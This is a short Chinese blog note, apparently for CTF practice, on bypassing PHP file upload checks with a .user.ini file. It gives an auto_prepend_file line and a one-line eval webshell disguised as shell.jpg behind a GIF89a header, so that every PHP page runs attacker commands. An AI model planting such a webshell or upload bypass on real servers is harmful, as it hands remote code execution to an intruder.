Ducklinger
0%

CTF文件上传

发表于 更新于 分类于

file_upload

.user.ini文件

只要是以fastcgi运行的php都可以用这个方法
.user.ini文件作为php配置文件 可利用利用配置项构造后门

auto_append_file  指定一个文件,自动包含在要执行的文件后
auto_prepend_file  指定一个文件,自动包含在要执行的文件前

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|-- .user.ini //配置文件
|-- shell.jpg //伪装成图片的后门
|-- index.php //网站正常文件

.user.ini内容:
——————
auto_prepend_file=shell.jpg
——————

shell.jpg内容:
——————
GIF89a //图片头绕过检测
<?=eval($_REQUEST['cmd']);?> //一句话木马
——————

即可在访问网站所有php文件时自动执行shell
-------------到底咯QAQ嘎嘎-------------